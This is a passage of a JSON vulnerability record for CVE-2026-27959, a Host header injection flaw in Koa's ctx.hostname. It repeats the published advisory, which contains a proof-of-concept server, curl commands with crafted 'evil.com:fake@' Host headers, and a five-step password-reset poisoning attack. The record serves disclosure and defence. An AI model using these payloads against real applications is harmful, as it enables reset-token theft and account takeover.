                    "text": "## Summary\n\nKoa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol (e.g., `evil.com:fake@legitimate.com`) is received, `ctx.hostname` returns `evil.com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks.\n\n## Details\n\nThe vulnerability exists in Koa's hostname getter in `lib/request.js`:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget hostname() {\n  const host = this.host;\n  if (!host) return '';\n  if ('[' === host[0]) return this.URL.hostname || ''; // IPv6 literal\n  return host.split(':', 1)[0];\n}\n```\n\nThe `host` getter retrieves the raw header value with HTTP/2 and proxy support:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget host() {\n  const proxy = this.app.proxy;\n  let host = proxy && this.get('X-Forwarded-Host');\n  if (!host) {\n    if (this.req.httpVersionMajor >= 2) host = this.get(':authority');\n    if (!host) host = this.get('Host');\n  }\n  if (!host) return '';\n  return host.split(',')[0].trim();\n}\n```\n\n### The Problem\n\nThe parsing logic simply splits on the first `:` and returns the first segment. 
There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2.\n\n**RFC 3986 Section 3.2.2** defines the host component as:\n\n```\nhost = IP-literal / IPv4address / reg-name\nreg-name = *( unreserved / pct-encoded / sub-delims )\nunreserved = ALPHA / DIGIT / \"-\" / \".\" / \"_\" / \"~\"\nsub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\"\n```\n\nThe `@` character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component.\n\n### Attack Vector\n\nWhen an attacker sends:\n\n```\nHost: evil.com:fake@legitimate.com:3000\n```\n\nKoa parses this as:\n\n| API | Returns | Notes |\n|-----|---------|-------|\n| `ctx.get('Host')` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header |\n| `ctx.hostname` | `\"evil.com\"` | **Attacker-controlled** |\n| `ctx.host` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header value |\n| `ctx.origin` | `\"http://evil.com:fake@legitimate.com:3000\"` | Protocol + malformed host |\n\nThe `ctx.hostname` API returns `evil.com` because the parser splits on the first `:` without understanding that `evil.com:fake@legitimate.com` is a malformed authority component where `evil.com:fake` would be interpreted as userinfo by a proper URI parser.\n\n### Additional Concern: `ctx.origin`\n\nKoa's `ctx.origin` property concatenates protocol and host without validation:\n\n```javascript\n// lib/request.js\nget origin() {\n  return `${this.protocol}://${this.host}`;\n}\n```\n\nApplications using `ctx.origin` for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo.\n\n### HTTP/2 Consideration\n\nKoa explicitly checks `httpVersionMajor >= 2` to read the `:authority` pseudo-header:\n\n```javascript\nif (this.req.httpVersionMajor >= 2) host = this.get(':authority');\n```\n\nThe same vulnerability applies - malformed 
`:authority` values containing userinfo would be accepted and parsed identically.\n\n## PoC\n\n### Setup\n\n```javascript\n// server.js\nconst Koa = require('koa'); \nconst app = new Koa();\n\n// Simulates password reset URL generation (common vulnerable pattern)\napp.use(async ctx => {\n  if (ctx.path === '/forgot-password') {\n    const resetToken = 'abc123securtoken';\n    const resetUrl = `${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken}`;\n    \n    ctx.body = {\n      message: 'Password reset link generated',\n      resetUrl: resetUrl,\n      debug: {\n        rawHost: ctx.get('Host'),\n        parsedHostname: ctx.hostname,\n        origin: ctx.origin,\n        protocol: ctx.protocol\n      }\n    };\n  }\n});\n\napp.listen(3000, () => console.log('Server on http://localhost:3000'));\n```\n\n### Exploit\n\n```bash\ncurl -H \"Host: evil.com:fake@localhost:3000\" http://localhost:3000/forgot-password\n```\n\n### Result\n\n```json\n{\n  \"message\": \"Password reset link generated\",\n  \"resetUrl\": \"http://evil.com/reset?token=abc123securtoken\",\n  \"debug\": {\n    \"rawHost\": \"evil.com:fake@localhost:3000\",\n    \"parsedHostname\": \"evil.com\",\n    \"origin\": \"http://evil.com:fake@localhost:3000\",\n    \"protocol\": \"http\"\n  }\n}\n```\n\nThe password reset URL points to `evil.com` instead of the legitimate server. In a real attack:\n\n1. Attacker requests password reset for victim's email with malicious Host header\n2. Server generates reset link using `ctx.hostname` → `https://evil.com/reset?token=SECRET`\n3. Victim receives email with poisoned link\n4. Victim clicks link, token is sent to attacker's server\n5. 
Attacker uses token to reset victim's password\n\n### Additional Test Cases\n\n```bash\n# Basic injection\ncurl -H \"Host: evil.com:x@legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n\n# With port preservation attempt\ncurl -H \"Host: evil.com:443@legitimate.com:3000\" http://localhost:3000/forgot-password  \n# Result: hostname = \"evil.com\"\n\n# Unicode/encoded variations\ncurl -H \"Host: evil.com:x%40legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n```\n\n### Deployment Consideration\n\nFor this attack to succeed in production, the malicious Host header must reach the Koa application. This occurs when:\n\n1. **No reverse proxy** - Application directly exposed to internet\n2. **Misconfigured proxy** - Proxy doesn't override/validate Host header\n3. **Proxy trust enabled** (`app.proxy = true`) - `X-Forwarded-Host` can be injected\n4. **Default virtual host** - Server is the catch-all for unrecognized Host headers\n\n## Impact\n\n### Vulnerability Type\n\n- CWE-20: Improper Input Validation\n- CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax\n\n### Attack Scenarios\n\n**1. Password Reset Poisoning (High Severity)**\n- Attacker hijacks password reset tokens by poisoning reset URLs\n- Requires victim to click link in email\n- Results in account takeover\n\n**2. Email Verification Bypass**\n- Attacker poisons email verification links\n- Can verify attacker-controlled email on victim accounts\n\n**3. OAuth/SSO Callback Manipulation**\n- Applications using `ctx.hostname` for OAuth redirect URIs\n- Attacker redirects OAuth callbacks to malicious server\n- Results in token theft\n\n**4. Web Cache Poisoning**\n- If responses are cached without Host in cache key\n- Poisoned URLs served to all users\n- Persistent XSS/phishing via cached responses\n\n**5. 
Server-Side Request Forgery (SSRF)**\n- Internal routing decisions based on `ctx.hostname`\n- Attacker manipulates which backend receives requests\n\n### Who Is Impacted\n\n- **Direct impact**: Any Koa application using `ctx.hostname` or `ctx.origin` for URL generation without additional validation\n- **Common patterns**: Password reset, email verification, webhook URL generation, multi-tenant routing, OAuth implementations",
                    "title": "github - https://github.com/advisories/GHSA-7gcc-r8m5-44qm"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nKoa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol (e.g., `evil.com:fake@legitimate.com`) is received, `ctx.hostname` returns `evil.com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks.\n\n## Details\n\nThe vulnerability exists in Koa's hostname getter in `lib/request.js`:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget hostname() {\n  const host = this.host;\n  if (!host) return '';\n  if ('[' === host[0]) return this.URL.hostname || ''; // IPv6 literal\n  return host.split(':', 1)[0];\n}\n```\n\nThe `host` getter retrieves the raw header value with HTTP/2 and proxy support:\n\n```javascript\n// Koa 2.16.1 - lib/request.js\nget host() {\n  const proxy = this.app.proxy;\n  let host = proxy && this.get('X-Forwarded-Host');\n  if (!host) {\n    if (this.req.httpVersionMajor >= 2) host = this.get(':authority');\n    if (!host) host = this.get('Host');\n  }\n  if (!host) return '';\n  return host.split(',')[0].trim();\n}\n```\n\n### The Problem\n\nThe parsing logic simply splits on the first `:` and returns the first segment. 
There is no validation that the resulting string is a valid hostname per RFC 3986 Section 3.2.2.\n\n**RFC 3986 Section 3.2.2** defines the host component as:\n\n```\nhost = IP-literal / IPv4address / reg-name\nreg-name = *( unreserved / pct-encoded / sub-delims )\nunreserved = ALPHA / DIGIT / \"-\" / \".\" / \"_\" / \"~\"\nsub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\"\n```\n\nThe `@` character is explicitly NOT permitted in the host component - it is the delimiter separating userinfo from host in the authority component.\n\n### Attack Vector\n\nWhen an attacker sends:\n\n```\nHost: evil.com:fake@legitimate.com:3000\n```\n\nKoa parses this as:\n\n| API | Returns | Notes |\n|-----|---------|-------|\n| `ctx.get('Host')` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header |\n| `ctx.hostname` | `\"evil.com\"` | **Attacker-controlled** |\n| `ctx.host` | `\"evil.com:fake@legitimate.com:3000\"` | Raw header value |\n| `ctx.origin` | `\"http://evil.com:fake@legitimate.com:3000\"` | Protocol + malformed host |\n\nThe `ctx.hostname` API returns `evil.com` because the parser splits on the first `:` without understanding that `evil.com:fake@legitimate.com` is a malformed authority component where `evil.com:fake` would be interpreted as userinfo by a proper URI parser.\n\n### Additional Concern: `ctx.origin`\n\nKoa's `ctx.origin` property concatenates protocol and host without validation:\n\n```javascript\n// lib/request.js\nget origin() {\n  return `${this.protocol}://${this.host}`;\n}\n```\n\nApplications using `ctx.origin` for URL generation receive the full malformed Host header value, creating URLs with embedded credentials that browsers may interpret as userinfo.\n\n### HTTP/2 Consideration\n\nKoa explicitly checks `httpVersionMajor >= 2` to read the `:authority` pseudo-header:\n\n```javascript\nif (this.req.httpVersionMajor >= 2) host = this.get(':authority');\n```\n\nThe same vulnerability applies - malformed 
`:authority` values containing userinfo would be accepted and parsed identically.\n\n## PoC\n\n### Setup\n\n```javascript\n// server.js\nconst Koa = require('koa'); \nconst app = new Koa();\n\n// Simulates password reset URL generation (common vulnerable pattern)\napp.use(async ctx => {\n  if (ctx.path === '/forgot-password') {\n    const resetToken = 'abc123securtoken';\n    const resetUrl = `${ctx.protocol}://${ctx.hostname}/reset?token=${resetToken}`;\n    \n    ctx.body = {\n      message: 'Password reset link generated',\n      resetUrl: resetUrl,\n      debug: {\n        rawHost: ctx.get('Host'),\n        parsedHostname: ctx.hostname,\n        origin: ctx.origin,\n        protocol: ctx.protocol\n      }\n    };\n  }\n});\n\napp.listen(3000, () => console.log('Server on http://localhost:3000'));\n```\n\n### Exploit\n\n```bash\ncurl -H \"Host: evil.com:fake@localhost:3000\" http://localhost:3000/forgot-password\n```\n\n### Result\n\n```json\n{\n  \"message\": \"Password reset link generated\",\n  \"resetUrl\": \"http://evil.com/reset?token=abc123securtoken\",\n  \"debug\": {\n    \"rawHost\": \"evil.com:fake@localhost:3000\",\n    \"parsedHostname\": \"evil.com\",\n    \"origin\": \"http://evil.com:fake@localhost:3000\",\n    \"protocol\": \"http\"\n  }\n}\n```\n\nThe password reset URL points to `evil.com` instead of the legitimate server. In a real attack:\n\n1. Attacker requests password reset for victim's email with malicious Host header\n2. Server generates reset link using `ctx.hostname` → `https://evil.com/reset?token=SECRET`\n3. Victim receives email with poisoned link\n4. Victim clicks link, token is sent to attacker's server\n5. 
Attacker uses token to reset victim's password\n\n### Additional Test Cases\n\n```bash\n# Basic injection\ncurl -H \"Host: evil.com:x@legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n\n# With port preservation attempt\ncurl -H \"Host: evil.com:443@legitimate.com:3000\" http://localhost:3000/forgot-password  \n# Result: hostname = \"evil.com\"\n\n# Unicode/encoded variations\ncurl -H \"Host: evil.com:x%40legitimate.com\" http://localhost:3000/forgot-password\n# Result: hostname = \"evil.com\"\n```\n\n### Deployment Consideration\n\nFor this attack to succeed in production, the malicious Host header must reach the Koa application. This occurs when:\n\n1. **No reverse proxy** - Application directly exposed to internet\n2. **Misconfigured proxy** - Proxy doesn't override/validate Host header\n3. **Proxy trust enabled** (`app.proxy = true`) - `X-Forwarded-Host` can be injected\n4. **Default virtual host** - Server is the catch-all for unrecognized Host headers\n\n## Impact\n\n### Vulnerability Type\n\n- CWE-20: Improper Input Validation\n- CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax\n\n### Attack Scenarios\n\n**1. Password Reset Poisoning (High Severity)**\n- Attacker hijacks password reset tokens by poisoning reset URLs\n- Requires victim to click link in email\n- Results in account takeover\n\n**2. Email Verification Bypass**\n- Attacker poisons email verification links\n- Can verify attacker-controlled email on victim accounts\n\n**3. OAuth/SSO Callback Manipulation**\n- Applications using `ctx.hostname` for OAuth redirect URIs\n- Attacker redirects OAuth callbacks to malicious server\n- Results in token theft\n\n**4. Web Cache Poisoning**\n- If responses are cached without Host in cache key\n- Poisoned URLs served to all users\n- Persistent XSS/phishing via cached responses\n\n**5. 
Server-Side Request Forgery (SSRF)**\n- Internal routing decisions based on `ctx.hostname`\n- Attacker manipulates which backend receives requests\n\n### Who Is Impacted\n\n- **Direct impact**: Any Koa application using `ctx.hostname` or `ctx.origin` for URL generation without additional validation\n- **Common patterns**: Password reset, email verification, webhook URL generation, multi-tenant routing, OAuth implementations",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-7gcc-r8m5-44qm.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.\nA flaw was found in Koa’s ctx.hostname API used in Node.js applications. The function incorrectly parses specially crafted HTTP Host headers containing an @ character, which can cause the extracted hostname value to differ from the intended origin. An attacker can exploit this behavior by sending a malicious Host header to influence the hostname value returned by ctx.hostname. Applications that rely on this value for generating absolute URLs, password reset links, or email verification links without additional validation may be susceptible to Host header injection attacks.\nRed Hat Product Security considers this issue as High severity. \nA remote, unauthenticated attacker can send a specially crafted HTTP Host header containing a valid RFC 3986 userinfo component (using the @ delimiter). Due to improper parsing of the authority field in the ctx.hostname API, the application may treat attacker-controlled input as the hostname value. Exploitation occurs when the server processes the malicious request; it does not require user interaction (UI:N).\nApplications that rely on ctx.hostname to construct absolute URLs, such as: password reset links, email verification links, OAuth redirect URIs, or webhook endpoints, may generate security-sensitive URLs that reference an attacker-controlled domain. 
This can result in integrity violations, including manipulation of authentication flows or account takeover scenarios. Integrity impact is therefore rated High.\nConfidentiality impact is considered Low because disclosure of sensitive data depends on application-specific usage patterns. The vulnerability does not automatically expose information from the server. However, if an affected application uses the manipulated hostname value to generate security-sensitive links such as password reset or email verification URLs and embeds tokens in those links without additional validation, a victim who later follows such a link may inadvertently disclose those tokens to an attacker-controlled domain. Such disclosure is conditional and application-dependent (for example, on how the application constructs URLs), and it requires subsequent user interaction beyond the initial exploitation; the confidentiality impact is therefore assessed as Low (C:L).",
                    "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-27959"
                },
                {
                    "category": "description",
                    "text": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa's `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-27959.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00117",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.0",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5723466",
                    "CSAFPID-5723467",
                    "CSAFPID-5733339",
                    "CSAFPID-1439279",
                    "CSAFPID-1439328",
                    "CSAFPID-1508265",
                    "CSAFPID-1508266",
                    "CSAFPID-2159493",
                    "CSAFPID-2933419",
                    "CSAFPID-5157328",
                    "CSAFPID-5222758",
                    "CSAFPID-5486263",
                    "CSAFPID-5486265",
                    "CSAFPID-5736894",
                    "CSAFPID-5129397",
                    "CSAFPID-5129398",
                    "CSAFPID-5138906",
                    "CSAFPID-5748307",
                    "CSAFPID-5748308",
                    "CSAFPID-5748309",
                    "CSAFPID-2205440",
                    "CSAFPID-2205442",
                    "CSAFPID-2205443",
                    "CSAFPID-2205447",
                    "CSAFPID-2205448",
                    "CSAFPID-3780409",
                    "CSAFPID-3780410",
                    "CSAFPID-3780411",
                    "CSAFPID-3780412",
                    "CSAFPID-3780413",
                    "CSAFPID-3780414",
                    "CSAFPID-3780415",
                    "CSAFPID-3780416",
                    "CSAFPID-3780417",
                    "CSAFPID-3780418",
                    "CSAFPID-3780419",
                    "CSAFPID-3780420",
                    "CSAFPID-3780421",
                    "CSAFPID-3780422",
                    "CSAFPID-3780423",
                    "CSAFPID-3780424",
                    "CSAFPID-3780425",
                    "CSAFPID-3780426",
                    "CSAFPID-3780427",
                    "CSAFPID-3780428",
                    "CSAFPID-3780429",
                    "CSAFPID-3780430",
                    "CSAFPID-3780431",
                    "CSAFPID-3780432",
                    "CSAFPID-3780433",
                    "CSAFPID-3780434",
                    "CSAFPID-3780435",
                    "CSAFPID-3780436",
                    "CSAFPID-3780437",
                    "CSAFPID-3780438",
                    "CSAFPID-3780439",
                    "CSAFPID-3780440",
                    "CSAFPID-3780441",
                    "CSAFPID-3780442",
                    "CSAFPID-3780443",
                    "CSAFPID-3780444",
                    "CSAFPID-3780445",
                    "CSAFPID-3780446",
                    "CSAFPID-3780447",
                    "CSAFPID-3780448",
                    "CSAFPID-3780449",
                    "CSAFPID-3780450",
                    "CSAFPID-3780451",
                    "CSAFPID-3780452",
                    "CSAFPID-3780453",
                    "CSAFPID-3780454",
                    "CSAFPID-3780455",
                    "CSAFPID-3780456",
                    "CSAFPID-3780457",
                    "CSAFPID-3780458",
                    "CSAFPID-3780459",
                    "CSAFPID-3780460",
                    "CSAFPID-3780461",
                    "CSAFPID-3780462",
                    "CSAFPID-3780463",
                    "CSAFPID-3780464",
                    "CSAFPID-3780466",
                    "CSAFPID-3780467",
                    "CSAFPID-3780468",
                    "CSAFPID-3780469",
                    "CSAFPID-3780470",
                    "CSAFPID-3780471",
                    "CSAFPID-3780472",
                    "CSAFPID-3780473",
                    "CSAFPID-3780474",
                    "CSAFPID-3780475",
                    "CSAFPID-3780476",
                    "CSAFPID-3780477",
                    "CSAFPID-3780478",
                    "CSAFPID-3780479",
                    "CSAFPID-3780480",
                    "CSAFPID-3797112",
                    "CSAFPID-3797113",
                    "CSAFPID-3797114",
                    "CSAFPID-3797115",
                    "CSAFPID-3797116",
                    "CSAFPID-3797117",
                    "CSAFPID-5129396",
                    "CSAFPID-5140726",
                    "CSAFPID-5140727",
                    "CSAFPID-5748305",
                    "CSAFPID-5748306"
                ],
                "known_not_affected": [
                    "CSAFPID-1441150",
                    "CSAFPID-2467450"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27959"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27959"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-27959"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27959.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27959"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-7gcc-r8m5-44qm"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-7gcc-r8m5-44qm"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-7gcc-r8m5-44qm.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27959"
                },
                {
                    "category": "external",
                    "summary": "Source raw - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27959.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-27959.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27959"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-7gcc-r8m5-44qm"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-27959"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/27xxx/CVE-2026-27959.json"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "Red Hat is not aware of a practical temporary workaround that fully mitigates this issue or meets Red Hat Product Security's standards for usability, deployment, applicability, or stability. Customers are advised to apply the relevant security updates once they become available.",
                    "product_ids": [
                        "CSAFPID-1439279",
                        "CSAFPID-1439328",
                        "CSAFPID-1441150",
                        "CSAFPID-1508265",
                        "CSAFPID-1508266",
                        "CSAFPID-2159493",
                        "CSAFPID-2467450",
                        "CSAFPID-2933419",
                        "CSAFPID-5157328",
                        "CSAFPID-5222758",
                        "CSAFPID-5486263",
                        "CSAFPID-5486265"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
                        "baseScore": 8.2,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-1439279",
                        "CSAFPID-1439328",
                        "CSAFPID-1508265",
                        "CSAFPID-1508266",
                        "CSAFPID-2159493",
                        "CSAFPID-2205440",
                        "CSAFPID-2205442",
                        "CSAFPID-2205443",
                        "CSAFPID-2205447",
                        "CSAFPID-2205448",
                        "CSAFPID-2933419",
                        "CSAFPID-3780409",
                        "CSAFPID-3780410",
                        "CSAFPID-3780411",
                        "CSAFPID-3780412",
                        "CSAFPID-3780413",
                        "CSAFPID-3780414",
                        "CSAFPID-3780415",
                        "CSAFPID-3780416",
                        "CSAFPID-3780417",
                        "CSAFPID-3780418",
                        "CSAFPID-3780419",
                        "CSAFPID-3780420",
                        "CSAFPID-3780421",
                        "CSAFPID-3780422",
                        "CSAFPID-3780423",
                        "CSAFPID-3780424",
                        "CSAFPID-3780425",
                        "CSAFPID-3780426",
                        "CSAFPID-3780427",
                        "CSAFPID-3780428",
                        "CSAFPID-3780429",
                        "CSAFPID-3780430",
                        "CSAFPID-3780431",
                        "CSAFPID-3780432",
                        "CSAFPID-3780433",
                        "CSAFPID-3780434",
                        "CSAFPID-3780435",
                        "CSAFPID-3780436",
                        "CSAFPID-3780437",
                        "CSAFPID-3780438",
                        "CSAFPID-3780439",
                        "CSAFPID-3780440",
                        "CSAFPID-3780441",
                        "CSAFPID-3780442",
                        "CSAFPID-3780443",
                        "CSAFPID-3780444",
                        "CSAFPID-3780445",
                        "CSAFPID-3780446",
                        "CSAFPID-3780447",
                        "CSAFPID-3780448",
                        "CSAFPID-3780449",
                        "CSAFPID-3780450",
                        "CSAFPID-3780451",
                        "CSAFPID-3780452",
                        "CSAFPID-3780453",
                        "CSAFPID-3780454",
                        "CSAFPID-3780455",
                        "CSAFPID-3780456",
                        "CSAFPID-3780457",
                        "CSAFPID-3780458",
                        "CSAFPID-3780459",
                        "CSAFPID-3780460",
                        "CSAFPID-3780461",
                        "CSAFPID-3780462",
                        "CSAFPID-3780463",
                        "CSAFPID-3780464",
                        "CSAFPID-3780466",
                        "CSAFPID-3780467",
                        "CSAFPID-3780468",
                        "CSAFPID-3780469",
                        "CSAFPID-3780470",
                        "CSAFPID-3780471",
                        "CSAFPID-3780472",
                        "CSAFPID-3780473",
                        "CSAFPID-3780474",
                        "CSAFPID-3780475",
                        "CSAFPID-3780476",
                        "CSAFPID-3780477",
                        "CSAFPID-3780478",
                        "CSAFPID-3780479",
                        "CSAFPID-3780480",
                        "CSAFPID-3797112",
                        "CSAFPID-3797113",
                        "CSAFPID-3797114",
                        "CSAFPID-3797115",
                        "CSAFPID-3797116",
                        "CSAFPID-3797117",
                        "CSAFPID-5129396",
                        "CSAFPID-5129397",
                        "CSAFPID-5129398",
                        "CSAFPID-5138906",
                        "CSAFPID-5140726",
                        "CSAFPID-5140727",
                        "CSAFPID-5157328",
                        "CSAFPID-5222758",
                        "CSAFPID-5486263",
                        "CSAFPID-5486265",
                        "CSAFPID-5723466",
                        "CSAFPID-5723467",
                        "CSAFPID-5733339",
                        "CSAFPID-5736894",
                        "CSAFPID-5748305",
                        "CSAFPID-5748306",
                        "CSAFPID-5748307",
                        "CSAFPID-5748308",
                        "CSAFPID-5748309"
                    ]
                }
            ],
            "title": "CVE-2026-27959"
        }
    ]
}